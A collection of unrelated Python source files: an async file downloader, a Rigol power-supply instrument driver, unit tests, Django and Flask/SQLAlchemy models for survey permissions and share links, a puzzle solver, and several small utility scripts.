logger.debug("HTTP request is correct, result found")
logger.debug("Validating that the last page exists")
try:
last_page = await does_page_exist_async(
url, p_count - 1, first_page, **kwargs)
except ValueError:
logger.error("Everything is OK, but last page doesn't exist")
raise LastPageDoesntExist(f"{kwargs}")
logger.debug("The last page exists")
logger.debug("Validated successfully")
return first_page, last_page
async def fetch_media_file(url: str, # type: ignore
ses: aiohttp.ClientSession,
**kwargs) -> Optional[Union[bytes, int]]:
"""
Coro, getting media content to write.
:return: bytes (media) if everything is OK,
-1 if there's 429 error, None if it is another error.
:exception: all exceptions should be processed here.
"""
worker_name = kwargs.pop('worker_name', '')
try:
resp = await ses.get(url, allow_redirects=True, params=kwargs)
except Exception as e:
logger.error(
f"{e}\n{worker_name}Cannot get "
f"answer from '{url}' with {kwargs}")
return # type: ignore
if resp.status == 200:
content = await resp.read()
resp.close()
return content
elif resp.status == 429:
resp.close()
return -1
logger.error(
f"{resp.status}: {resp.reason} requesting to {resp.url}"
)
resp.close()
async def dump(content: bytes,
filename: str) -> None:
""" Dump content to media file."""
async with aiofiles.open(filename, 'wb') as f:
await f.write(content)
async def worker_fetching_media(worker_name: str,
q_args: asyncio.Queue) -> None:
"""
Worker getting media file and dumping it to file.
Wait some time and request again if there's 429 error.
"""
while True:
url, ses, filename = q_args.get_nowait()
logger.debug(f"{worker_name}Requested to '{url}'")
content = await fetch_media_file(url, ses, worker_name=worker_name)
if content is None:
q_args.task_done()
return
while content == -1:
logger.debug(
f"{worker_name}: 429 'Too many requests', "
f"url: {url}; wait {WAIT}s"
)
await asyncio.sleep(WAIT)
content = await fetch_media_file(url, ses, worker_name=worker_name)
logger.debug(f"{worker_name}Received from '{url}'")
logger.debug(f"{worker_name}Dumping '{url}' to '{filename}'")
await dump(content, filename) # type: ignore
logger.debug(f"{worker_name}'{filename}' dumped")
q_args.task_done()
async def download_docs_coro(url_to_name: List[Tuple[str, str]]) -> None:
""" Coro running 5 workers to download media files. """
timeout = aiohttp.ClientTimeout(WAIT)
q_args = asyncio.Queue(maxsize=-1) # type: ignore
async with aiohttp.ClientSession(timeout=timeout) as ses:
for url, filename in url_to_name:
await q_args.put((url, ses, filename))
tasks = []
for worker_number in range(5):
name = f"Worker-{worker_number + 1}: "
task = asyncio.create_task(
worker_fetching_media(name, q_args))
tasks += [task]
await q_args.join()
for task in tasks:
task.cancel()
def download_docs(url_to_name: List[Tuple[str, str]]) -> None:
"""
Run coro, download the files.
:param url_to_name: list of tuples of str, pairs: url – filename.
"""
logger.info(f"Requested {len(url_to_name)} files to download")
coro_start = time.time()
asyncio.run(download_docs_coro(url_to_name))
logger.info(f"Downloading completed, coro executing time: "
f"{round(time.time() - coro_start, 2)}s")
async def download_docs_async(url_to_name: List[Tuple[str, str]]) -> None:
"""
Run coro, download the files.
:param url_to_name: list of tuples of str, pairs: url – filename.
"""
logger.info(f"Requested {len(url_to_name)} files to download")
coro_start = time.time()
await download_docs_coro(url_to_name)
logger.info(f"Downloading completed, coro executing time: "
f"{round(time.time() - coro_start, 2)}s")
|
nilq/baby-python
|
python
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .. import ivi
from .. import dcpwr
from .. import scpi
TrackingType = set(['floating'])
TriggerSourceMapping = {
'immediate': 'imm',
'bus': 'bus'}
class rigolBaseDCPwr(scpi.dcpwr.Base, scpi.dcpwr.Trigger, scpi.dcpwr.SoftwareTrigger,
scpi.dcpwr.Measurement):
"Rigol generic IVI DC power supply driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', '')
super(rigolBaseDCPwr, self).__init__(*args, **kwargs)
self._output_count = 3
self._output_spec = [
{
'range': {
'P8V': (8.0, 5.0)
},
'ovp_max': 8.8,
'ocp_max': 5.5,
'voltage_max': 8.0,
'current_max': 5.0
},
{
'range': {
'P30V': (30.0, 2.0)
},
'ovp_max': 33.0,
'ocp_max': 2.2,
'voltage_max': 30.0,
'current_max': 2.0
},
{
'range': {
'N30V': (-30.0, 2.0)
},
'ovp_max': -33.0,
'ocp_max': 2.2,
'voltage_max': -30.0,
'current_max': 2.0
}
]
self._memory_size = 10
self._identity_description = "Rigol generic IVI DC power supply driver"
self._identity_identifier = ""
self._identity_revision = ""
self._identity_vendor = ""
self._identity_instrument_manufacturer = "Rigol Technologies"
self._identity_instrument_model = ""
self._identity_instrument_firmware_revision = ""
self._identity_specification_major_version = 3
self._identity_specification_minor_version = 0
self._identity_supported_instrument_models = ['DP831A', 'DP832', 'DP832A']
self._add_method('memory.save',
self._memory_save)
self._add_method('memory.recall',
self._memory_recall)
self._init_outputs()
def _get_bool_str(self, value):
"""
redefining to change behavior from '0'/'1' to 'off'/'on'
"""
if bool(value):
return 'on'
return 'off'
def _memory_save(self, index):
index = int(index)
if index < 1 or index > self._memory_size:
raise OutOfRangeException()
if not self._driver_operation_simulate:
self._write("*sav %d" % index)
def _memory_recall(self, index):
index = int(index)
if index < 1 or index > self._memory_size:
raise OutOfRangeException()
if not self._driver_operation_simulate:
self._write("*rcl %d" % index)
def _utility_self_test(self):
code = 0
message = "No Response"
if not self._driver_operation_simulate:
self._write("*TST?")
# wait for test to complete
message = self._read()
if 'FAIL' in message:
code = -1
return (code, message)
|
nilq/baby-python
|
python
|
from maskcnn import training_aux_wrapper
from sys import argv
def main():
dataset, image_subset, neuron_subset, seed, arch_name, opt_name = argv[1:]
training_aux_wrapper.train_one_wrapper(dataset, image_subset, neuron_subset, int(seed), arch_name, opt_name)
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
import numpy
import unittest
import sycomore
from sycomore.units import *
class TestBloch(unittest.TestCase):
def test_pulse(self):
M = sycomore.bloch.pulse(47*deg, 23*deg)
numpy.testing.assert_almost_equal(
M,
[[ 0.95145043, 0.11437562, 0.28576266, 0. ],
[ 0.11437562, 0.73054793, -0.67321463, 0. ],
[-0.28576266, 0.67321463, 0.68199836, 0. ],
[ 0. , 0. , 0. , 1. ]])
def test_time_interval(self):
M = sycomore.bloch.time_interval(
sycomore.Species(1000*ms, 100*ms, delta_omega=420*Hz), 10*ms)
numpy.testing.assert_almost_equal(
M,
[[ 0.27961014, -0.86055152, 0. , 0. ],
[ 0.86055152, 0.27961014, 0. , 0. ],
[ 0. , 0. , 0.99004983, 0.00995017],
[ 0. , 0. , 0. , 1. ]])
def test_relaxation(self):
M = sycomore.bloch.relaxation(sycomore.Species(1000*ms, 100*ms), 10*ms)
numpy.testing.assert_almost_equal(
M,
[[0.90483742, 0. , 0. , 0. ],
[0. , 0.90483742, 0. , 0. ],
[0. , 0. , 0.99004983, 0.00995017],
[0. , 0. , 0. , 1. ]])
def test_phase_accumulation(self):
M = sycomore.bloch.phase_accumulation(numpy.pi/6*rad)
numpy.testing.assert_almost_equal(
M,
[[ 0.8660254, -0.5 , 0. , 0. ],
[ 0.5 , 0.8660254, 0. , 0. ],
[ 0. , 0. , 1. , 0. ],
[ 0. , 0. , 0. , 1. ]])
if __name__ == "__main__":
unittest.main()
|
nilq/baby-python
|
python
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from project.tweets.views import TweetsViewset
router = DefaultRouter()
router.register(r"tweets", TweetsViewset, basename="tweets")
urlpatterns = [
path("", include(router.urls)),
]
|
nilq/baby-python
|
python
|
import random
import names
import csv
from django.template.defaultfilters import slugify
from orcamentos.crm.models import Customer, Person, PhonePerson
from orcamentos.utils.lists import COMPANY_LIST
from orcamentos.utils.gen_random_values import (
gen_cpf,
gen_digits,
gen_phone,
gen_rg,
)
from orcamentos.utils.gen_names import (
gen_female_first_name,
gen_male_first_name,
)
customer_list = []
address_list = []
''' Lendo os dados de clientes_.csv '''
with open('fix/clientes_.csv', 'r') as f:
r = csv.DictReader(f)
for dct in r:
customer_list.append(dct)
f.close()
''' Lendo os dados de enderecos_.csv '''
with open('fix/enderecos_.csv', 'r') as f:
r = csv.DictReader(f)
for dct in r:
address_list.append(dct)
f.close()
REPEAT = len(customer_list) + 8
photo = 'http://icons.iconarchive.com/icons/icons-land/vista-people/256/Office-Customer-Male-Light-icon.png'
for i in range(REPEAT):
g = random.choice(['M', 'F'])
if g == 'M':
treatment = gen_male_first_name()['treatment']
first_name = gen_male_first_name()['first_name']
else:
treatment = gen_female_first_name()['treatment']
first_name = gen_female_first_name()['first_name']
last_name = names.get_last_name()
if i < 17:
gender = 'M'
treatment = None
first_name = customer_list[i]['first_name']
last_name = None
company = None
customer_type = customer_list[i]['customer_type']
email = None
else:
gender = g
company = random.choice(COMPANY_LIST)
customer_type = 'p'
email = first_name[0].lower() + '.' + \
last_name.lower() + '@example.com'
if customer_type == 'p':
cpf = gen_cpf()
rg = gen_rg()
cnpj = None
ie = None
else:
cpf = None
rg = None
cnpj = gen_digits(14)
ie = 'isento'
slug = slugify('{} {}'.format(first_name, last_name))
obj = Customer(
person_type='c',
gender=g,
treatment=treatment,
first_name=first_name,
last_name=last_name,
slug=slug,
photo=photo,
company=company,
email=email,
customer_type=customer_type,
cpf=cpf,
rg=rg,
cnpj=cnpj,
ie=ie,
address=address_list[i]['address'],
district=address_list[i]['district'],
city=address_list[i]['city'],
uf=address_list[i]['uf'],
cep=address_list[i]['cep'],
)
obj.save()
# done
'''
Para cada Person incluimos dois telefones:
um principal e um celular
'''
customers = Customer.objects.all()
aux = []
for person in customers:
obj_pri = PhonePerson(
phone=gen_phone(),
person=person,
)
obj = PhonePerson(
phone=gen_phone(),
person=person,
phone_type='cel'
)
aux.append(obj_pri)
aux.append(obj)
PhonePerson.objects.bulk_create(aux)
|
nilq/baby-python
|
python
|
from urllib.request import urlopen
def get_page_3(url):
pagina = urlopen(url)
codigoHtml = pagina.read().decode('utf')
pagina.close()
return codigoHtml
def get_next_target(website):
start_link= website.find('<a href')
if (start_link) != -1:
start_quote= website.find('"',start_link)
end_quote= website.find('"',start_quote+1)
url= website[start_quote+1:end_quote]
page = website[end_quote+1:]
return url
return start_link
page = get_page_3('http://xkcd.com/353')
while get_next_target(page) != -1 :
url = get_next_target(page)
print (url)
print (page)
|
nilq/baby-python
|
python
|
/home/runner/.cache/pip/pool/cf/51/25/b749cb02a5396340ce9fda7fffc4272d66af9443a947242291d6202aba
|
nilq/baby-python
|
python
|
def proc():
str = input()
fp = open('./dict/person.dic', mode='rt', encoding='utf-8')
while True:
line = fp.readline()
if not line:
break
if str in line:
return
fp.close()
fp = open('./dict/person.dic', mode='at', encoding='utf-8')
fp.write('\n%s/NNP' % str)
fp.close()
print('Added!')
while True:
proc()
|
nilq/baby-python
|
python
|
import numpy as np
import libs.state_node as STTREE
class HillClimbing:
def __init__(self, initialPuzzle, answerPuzzle, k):
self.totalExpansions = 0
self.k = k
self.answerPuzzle = answerPuzzle.puzzle
self.frontier = []
self.frontier.append(
(
STTREE.StateNode(initialPuzzle.puzzle, initialPuzzle.n),
self.manhattanDistance(initialPuzzle.puzzle),
0,
)
)
self.path = []
def manhattanDistance(self, actualPuzzle):
# Calculates the Manhattan Distance: sum of the distances of each piece to it's correct position
totalDist = 0
actualPiece = 1
for x in range(len(actualPuzzle)):
for y in range(len(actualPuzzle[x])):
if not (x == len(actualPuzzle) - 1 and y == len(actualPuzzle[x]) - 1):
actualCoord = np.where(actualPuzzle == actualPiece)
coordX, coordY = actualCoord[0][0], actualCoord[1][0]
totalDist += abs(x - coordX) + abs(y - coordY)
actualPiece += 1
return totalDist
def checkNodeSolution(self, nodePuzzle):
return np.array_equal(nodePuzzle, self.answerPuzzle)
def insertNodeToFrontier(self, node, actualCost):
# If the node action exists
if node:
self.frontier.append(
(node, self.manhattanDistance(node.puzzle), actualCost + 1)
)
def sortFrontier(self):
self.frontier = sorted(self.frontier, key=lambda x: x[1])
def execute(self):
# Initializing the actual distance with the greater possible value
actualDistance = float("inf")
k = self.k
while len(self.frontier) > 0:
self.sortFrontier()
newNode, newDistance, newCost = self.frontier.pop(0)
# If the avaliation function (Manhattan Distance) of the new node is smaller than the old actual node, reset the k for lateral movements
if newDistance < actualDistance:
k = self.k
actualNode, actualDistance, actualCost = newNode, newDistance, newCost
self.path.append(actualNode.puzzle)
elif newDistance == actualDistance:
# If the remaining lateral movements is greater than 0, move laterally and decrease k by 1
if k > 0:
k -= 1
actualNode, actualDistance, actualCost = (
newNode,
newDistance,
newCost,
)
self.path.append(actualNode.puzzle)
# If the remaining lateral movements is 0, return the actual node
else:
return actualNode, self.totalExpansions, actualCost
# If no frontier node is better than then actual one, finish the Hill Climbing and return the actual node
else:
return actualNode, self.totalExpansions, actualCost
if self.checkNodeSolution(actualNode.puzzle):
return actualNode, self.totalExpansions, actualCost
else:
actualNode.expand()
self.totalExpansions += 1
# Clears the frontier to insert the new nodes
self.frontier.clear()
self.insertNodeToFrontier(actualNode.up, actualCost)
self.insertNodeToFrontier(actualNode.down, actualCost)
self.insertNodeToFrontier(actualNode.left, actualCost)
self.insertNodeToFrontier(actualNode.right, actualCost)
# If, for some reason, the solver doesn't found a solution, then return the last actual node as an answer
return actualNode, self.totalExpansions, actualCost
|
nilq/baby-python
|
python
|
# Generated by Django 3.1.13 on 2021-09-28 03:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('property', '0010_auto_20210928_0430'),
]
operations = [
migrations.AlterField(
model_name='property',
name='property_area',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=20, verbose_name='Area Sq/Ft'),
),
migrations.AlterField(
model_name='property',
name='property_price',
field=models.DecimalField(decimal_places=2, default=0.0, help_text='if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ', max_digits=20, verbose_name='Property Price'),
),
]
|
nilq/baby-python
|
python
|
from supermarket import Supermarket
from Markov import Get_Entry
entry = Get_Entry()
lidl = Supermarket(name='LIDL', entry = entry)
while lidl.is_open():
# increase the time of the supermarket by one minute
# generate new customers at their initial location
# repeat from step 1
lidl.add_new_customers()
lidl.print_customers()
lidl.next_minute()
# remove churned customers from the supermarket
lidl.remove_exitsting_customers()
|
nilq/baby-python
|
python
|
"""
Timeseries plots with error bands
=================================
_thumb: .5, .45
"""
import seaborn as sns
sns.set(style="darkgrid")
# Load an example dataset with long-form data
fmri = sns.load_dataset("fmri")
# Plot the responses for different events and regions
sns.lineplot(x="timepoint", y="signal",
hue="region", style="event",
data=fmri)
|
nilq/baby-python
|
python
|
from typing import Literal, Any, List, Dict
from flask_sqlalchemy import SQLAlchemy
from base64 import b32encode
from flask import session
from globals import *
import xml.etree.ElementTree as ET
import sqlite3
import secrets
import random
import error
import re
import os
db = SQLAlchemy(app)
Role = Literal['s', 'u', 'g']
Permission = Literal['o', 'w', 'r', 'n']
PERMISSION_ORDER = ['n', 'r', 'w', 'o']
class User(db.Model):
__tablename__ = "Users"
id = db.Column(db.Integer, primary_key=True) #: User Id
CasLogin = db.Column(db.String(80), unique=True, nullable=False) #: CAS Login
Pesel = db.Column(db.String(11), nullable=True) #: PESEL number of the user
FetchData = db.Column(db.Boolean, nullable=False) #: No use of this value is implemented yet
Role = db.Column(db.String, default='g', nullable=False) #: The user's role in the system
def as_dict(self):
ud = {
"id": self.id,
"casLogin": self.CasLogin.split('@')[0],
"fetchData": self.FetchData,
"role": self.Role,
"logged": self.Role != 'g',
}
if DEBUG:
ud["debug"] = True
return ud
class Survey(db.Model):
__tablename__ = "Surveys"
id = db.Column(db.Integer, primary_key=True) #: Survey Id
Name = db.Column(db.String(80), nullable=False) #: Title of the survey
AnkieterId = db.Column(db.Integer, unique=True) #: Id of the Survey in USOS Ankieter
StartedOn = db.Column(db.DateTime, nullable=True) #: Start date of the survey
EndsOn = db.Column(db.DateTime, nullable=True) #: End date of the survey
IsActive = db.Column(db.Integer, nullable=True) #: No use of this value is implemented yet
QuestionCount = db.Column(db.Integer, nullable=True) #: Number of questions in the survey
BackgroundImg = db.Column(db.String(50), default=None) #: Filename of the survey's backgroun image in the menu
AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id')) #: Id of the user who created the survey
class Report(db.Model):
__tablename__ = "Reports"
id = db.Column(db.Integer, primary_key=True) #: Report Id
Name = db.Column(db.String(80), nullable=False) #: Title of the report
SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), nullable=False) #: Id of the source survey
BackgroundImg = db.Column(db.String(50)) #: Filename of the report's background image in the menu
AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id')) #: Id of the user who created the report
class UserGroup(db.Model):
__tablename__ = "UserGroups"
UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)
Group = db.Column(db.String(25), primary_key=True)
class SurveyGroup(db.Model):
__tablename__ = "SurveyGroups"
SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True) #: Id of the survey that belongs to a group
Group = db.Column(db.String(25), primary_key=True) #: The name of the group
class ReportGroup(db.Model):
__tablename__ = "ReportGroups"
ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True) #: Id of the report that belongs to a group
Group = db.Column(db.String(25), primary_key=True) #: The name of the group
class SurveyPermission(db.Model):
__tablename__ = "SurveyPermissions"
SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True) #: The Id of the survey the permission is to
UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True) #: The Id of the user that holds the permission
Type = db.Column(db.String, default='r', nullable=False) #: The type of the permission
class ReportPermission(db.Model):
__tablename__ = "ReportPermissions"
ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True) #: The Id of the report the permission is to
UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True) #: The Id of the user that holds the permission
Type = db.Column(db.String, default='r', nullable=False) #: The type of the permission
class Link(db.Model):
__tablename__ = "Links"
id = db.Column(db.Integer, primary_key=True) #: Link Id
Salt = db.Column(db.String(SALT_LENGTH)) #: The salt of the link
PermissionType = db.Column(db.String, default='r', nullable=False) #: Perission granted by the link
ObjectType = db.Column(db.String, nullable=False) #: Type of the object the permission is to
ObjectId = db.Column(db.Integer, nullable=False) #: Id of the object the permission is to
ADMIN.add_view(ModelView(User, db.session))
ADMIN.add_view(ModelView(Survey, db.session))
def get_user(login: Any = "") -> User:
"""Get a user object from DB.
:param login: User's CAS login, id or guest if empty string (default: "")
:raises error.API: no such user
:return: User object
:rtype: User
"""
user = None
if not login:
# zamiast tego blędu, jeśli nie ma loginu, to przydziel gościa
if 'username' not in session:
session['username'] = GUEST_NAME
if session['username'] == GUEST_NAME:
return User.query.filter_by(Role='g').first()
login = session['username']
if type(login) is str:
if '@' in login:
user = User.query.filter_by(CasLogin=login).first()
elif re.match("[0-9]+", login):
user = User.query.filter_by(Pesel=login).first()
else:
users = get_all_users()
for u in users["users"]:
if u["casLogin"].split("@")[0] == login:
user = User.query.filter_by(id=u["id"]).first()
if type(login) is int:
user = User.query.filter_by(id=login).first()
if user is None:
raise error.API(f'no such user {login}')
return user
def create_user(cas_login: str, pesel: str, role: str) -> User:
"""Create a new user.
:param cas_login: New user's cas login
:type cas_login: str
:param pesel: New user's PESEL number
:type pesel: str
:param role: New user's role (values: 's','u','g')
:type role: Role
:return: The new user's User object
:rtype: User
"""
user = User(CasLogin=cas_login, Pesel=pesel, Role=role, FetchData=True)
db.session.add(user)
db.session.commit()
return user
def delete_user(user: User):
"""Delete user from Users database and their permissions
from SurveyPermissions and ReportPermissions.
:param user: The user to be deleted
:type user: User
"""
sur_perms = SurveyPermission.query.filter_by(UserId=user.id).all()
rep_perms = ReportPermission.query.filter_by(UserId=user.id).all()
groups = UserGroup.query.filter_by(UserId=user.id).all()
for sp in sur_perms:
db.session.delete(sp)
for rp in rep_perms:
db.session.delete(rp)
for g in groups:
db.session.delete(g)
db.session.delete(user)
db.session.commit()
def get_survey(survey_id: int) -> Survey:
"""Get survey by given id.
:param survey_id: Survey's id
:type survey_id: int
:raises error.API: no such survey
:return: Returns survey
:rtype: Survey
"""
survey = Survey.query.filter_by(id=survey_id).first()
if survey is None:
raise error.API('no such survey')
return survey
def get_report(report_id: int) -> Report:
"""Get report by given id.
:param id: Id of a report
:type id: int
:raises error.API: no such report
:return: Requested report object
:rtype: Report
"""
report = Report.query.filter_by(id=report_id).first()
if report is None:
raise error.API('no such report')
return report
def get_permission_link(permission: Permission, object_type: Literal['s', 'r'], object_id: int) -> str:
"""Create and obtain a permission link.
:param permission: Permission type (values: 'o', 'w', 'r', 'n')
:type permission: Role
:param object_type: Type of the object shared by the link
:type object_type: Literal['s', 'r']
:param object_id: Id of the object
:type object_id: int
:return: A concatenated salt and link id as a string
:rtype: str
"""
link = Link.query.filter_by(PermissionType=permission, ObjectType=object_type, ObjectId=object_id).first()
if link is not None:
return link.Salt + str(link.id)
bits = secrets.randbits(5*SALT_LENGTH)
salt = bits.to_bytes(5*SALT_LENGTH//8+1, byteorder='big')
salt = b32encode(salt).decode('utf-8')[:SALT_LENGTH]
salt = salt.lower()
print(salt)
link = Link(
Salt=salt,
PermissionType=permission,
ObjectType=object_type,
ObjectId=object_id
)
db.session.add(link)
db.session.commit()
return link.Salt + str(link.id)
def set_permission_link(tag: str, user: User):
"""Set permission using link.
:param tag: Salt and id string from the link
:type tag: str
:param user: User that will gain the permission
:type user: User
:return: Returns permission type, object name and object id
:rtype: Permission, object, int
"""
link = get_link_details(tag)
if link is None:
raise error.API('wrong url')
object_type = link.ObjectType
if object_type == 's':
object_name = 'survey'
get_object = get_survey
get_permission = get_survey_permission
set_permission = set_survey_permission
elif object_type == 'r':
object_name = 'report'
get_object = get_report
get_permission = get_report_permission
set_permission = set_report_permission
else:
raise error.API(f'unknown database object type "{object_type}"')
object = get_object(link.ObjectId)
perm = get_permission(object, user)
if PERMISSION_ORDER.index(perm) >= PERMISSION_ORDER.index(link.PermissionType):
return link.PermissionType, object_name, object.id
set_permission(object, user, link.PermissionType, bylink=True)
return link.PermissionType, object_name, object.id
def get_link_details(tag: str) -> Link:
"""Get link details
:param tag: Salt and id string from the link
:type tag: str
:return: Returns a Link object
:rtype: Link
"""
salt = tag[:SALT_LENGTH]
id = int(tag[SALT_LENGTH:])
link = Link.query.filter_by(id=id, Salt=salt).first()
return link
def get_report_users(report: Report) -> dict:
"""Get users having permission to the given report
:param report: The report
:type report: Report
:return: Returns a dict with user ids as keys and their permissions under them
:rtype: dict
"""
perms = ReportPermission.query.filter_by(ReportId=report.id).all()
result = {}
for perm in perms:
result[perm.UserId] = perm.Type
return result
def get_survey_users(survey: Survey) -> dict:
"""Get users having permission to given survey
:param survey: The survey
:type survey: Survey
:return: Returns a dict with user ids as keys and their permissions under them
:rtype: dict
"""
perms = SurveyPermission.query.filter_by(SurveyId=survey.id).all()
result = {}
for perm in perms:
result[perm.UserId] = perm.Type
return result
def get_all_users() -> dict:
"""Get all users
:return: Cas logins and users id.
:rtype: dict
"""
users = User.query.all()
result = []
for u in users:
result.append({
"casLogin": u.CasLogin.split('@')[0],
"id": u.id
})
return {"users": result}
def get_groups() -> List[str]:
"""Get all groups from UserGroups
:return: List of all groups
:rtype: List[str]
"""
user_groups = UserGroup.query.with_entities(UserGroup.Group).distinct()
return [ug.Group for ug in user_groups]
def set_user_group(user: User, group_name: str):
"""Set group for user. If already exists do nothing.
:param user: User
:type user: User
:param group_name: Name of a group
:type group_name: str
"""
user_group = UserGroup.query.filter_by(UserId=user.id, Group=group_name).first()
if user_group is None:
user_group = UserGroup(UserId=user.id, Group=group_name)
db.session.add(user_group)
db.session.commit()
def unset_user_group(user: User, group: str):
"""Unset user from a group.
:param user: User object
:type user: User
:param group: Group name
:type group: str
"""
user_group = UserGroup.query.filter_by(UserId=user.id, Group=group)
if user_group is None:
raise error.API('the user is not in the group')
user_group.delete()
db.session.commit()
def get_user_groups(user: User) -> List[str]:
"""Get all groups for given user
:param user: Given user
:type user: User
:return: List of user's groups names
:rtype: List
"""
user_groups = UserGroup.query.filter_by(UserId=user.id).all()
if user_groups is None:
return []
return [user_group.Group for user_group in user_groups]
def get_user_surveys(user: User) -> List[Survey]:
"""Get surveys for which the user has permissions.
For administrators it returns all surveys.
:param user: User object
:type user: User
:return: List of Survey objects
:rtype: List[Survey]
"""
if user.Role == 's':
return Survey.query.all()
user_surveys = SurveyPermission.query.filter_by(UserId=user.id).all()
surveys = []
for survey in user_surveys:
surveys.append(Survey.query.filter_by(id=survey.SurveyId).first())
if 'surveys' in session:
for id in session['surveys']:
surveys.append(Survey.query.filter_by(id=int(id)).first())
return surveys
def get_user_reports(user: User) -> List[Report]:
"""Get reports for which the user has permissions.
For administrators it returns all reports.
:param user: User object
:type user: User
:return: List of Report objects
:rtype: List[Report]
"""
if user.Role == 's':
return Report.query.all()
user_reports = ReportPermission.query.filter_by(UserId=user.id).all()
reports = []
for report in user_reports:
reports.append(Report.query.filter_by(id=report.ReportId).first())
if 'reports' in session:
for id in session['reports']:
reports.append(Report.query.filter_by(id=int(id)).first())
return reports
def get_group_users(group: str) -> List[User]:
"""Get users assigned to given group.
:param group: Name of a group
:rtype group: str
:return: Returns List of User objects
:rtype: List[User]
"""
user_groups = UserGroup.query.filter_by(Group=group).all()
users = []
for user_group in user_groups:
user = User.query.filter_by(id=user_group.UserId).first()
if user is not None:
users.append(user)
return users
def rename_report(report: Report, name: str):
"""Rename report.
:param report: The Report object
:type report: Report
:param name: New report name
:type name: str
"""
report.Name = name
db.session.commit()
def rename_survey(survey: Survey, name: str):
"""Rename survey.
:param survey: The Survey object
:type survey: Survey
:param name: New survey name
:type name: str
"""
survey.Name = name
db.session.commit()
def delete_group(group: str):
"""Delete a group
:param group: The name of the group
:type group: str
"""
UserGroup.query.filter_by(Group=group).delete()
db.session.commit()
def create_survey(user: User, name: str) -> Survey:
"""Create survey by given user
:param user: The creator of the new survey
:type user: User
:param name: Name of a survey
:type name: str
:return: The object of the new survey
:rtype: Survey
"""
backgrounds = os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg'))
survey = Survey(Name=name, QuestionCount=0, AuthorId=user.id, BackgroundImg=random.choice(backgrounds))
db.session.add(survey)
db.session.commit()
set_survey_permission(survey, user, 'o')
return survey
# meta = {"started_on": DateTime, "ends_on": DateTime, "is_active": int}
def set_survey_meta(survey: Survey, name: str, question_count: int, meta: dict):
"""Add meta information of a given survey.
:param survey: The survey to be modified
:type survey: Survey
:param name: The new name of a survey
:type name: int
:param question_count: Number of questions
:type question_count: int
:param meta: Other information (started_on, ends_on, is_active)
:type meta: dict
"""
if survey is None:
survey = Survey(Name=name, QuestionCount=question_count)
db.session.add(survey)
if name:
survey.Name = name
if meta["started_on"]:
survey.StartedOn = meta["started_on"]
if meta["ends_on"]:
survey.EndsOn = meta["ends_on"]
if meta["is_active"]:
survey.IsActive = meta["is_active"]
if survey.BackgroundImg is None:
bkgs = os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg'))
survey.BackgroundImg = random.choice(bkgs)
db.session.commit()
print("Survey meta data added")
return True
def get_survey_permission(survey: Survey, user: User) -> Permission:
"""Get permission of given user for the survey.
:param survey: The survey
:type survey: Survey
:param user: The user whose permissions are to be checked
:type user: User
:return: The user's permissions for the survey
:rtype: Permission
"""
if 'surveys' in session and str(survey.id) in session['surveys']:
return session['surveys'][str(survey.id)]
sp = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
if sp is None and user.Role == 's':
return ADMIN_DEFAULT_PERMISSION
elif sp is None:
return 'n'
return sp.Type
def set_survey_permission(survey: Survey, user: User, permission: Permission, bylink=False):
"""Set permission of given user for survey.
:param survey: The survey
:type survey: Survey
:param user: The user whose permissions are to be set
:type user: User
:param permission: The user's permissions for the survey
:type permission: Permission
:param bylink: Is the permission set because of a link? (default: False)
:type belink: bool
"""
# If the permission is set because of a link, and the user is a guest
# then set it only temporarily, in their session.
if bylink and user.Role == 'g':
if 'surveys' not in session:
session['surveys'] = {}
if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
session['surveys'][survey.id] = 'r'
return
sp = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
if sp is None:
sp = SurveyPermission(SurveyId=survey.id, UserId=user.id)
db.session.add(sp)
if permission != "n":
sp.Type = permission
else:
db.session.delete(sp)
db.session.commit()
def get_report_survey(report: Report) -> Survey:
"""Get survey assigned to the given report
:param report: Report object
:type report: Report
:return: The source survey of the report
:rtype: Survey
"""
if report is None:
raise error.API('no such report')
survey = Survey.query.filter_by(id=report.SurveyId).first()
return survey
def get_report_permission(report: Report, user: User) -> Permission:
"""Get permission of given user for the report.
:param report: The report
:type report: Report
:param user: The user whose permissions are to be checked
:type user: User
:return: The user's permissions for the report
:rtype: Permission
"""
if 'reports' in session and str(report.id) in session['reports']:
return session['reports'][str(report.id)]
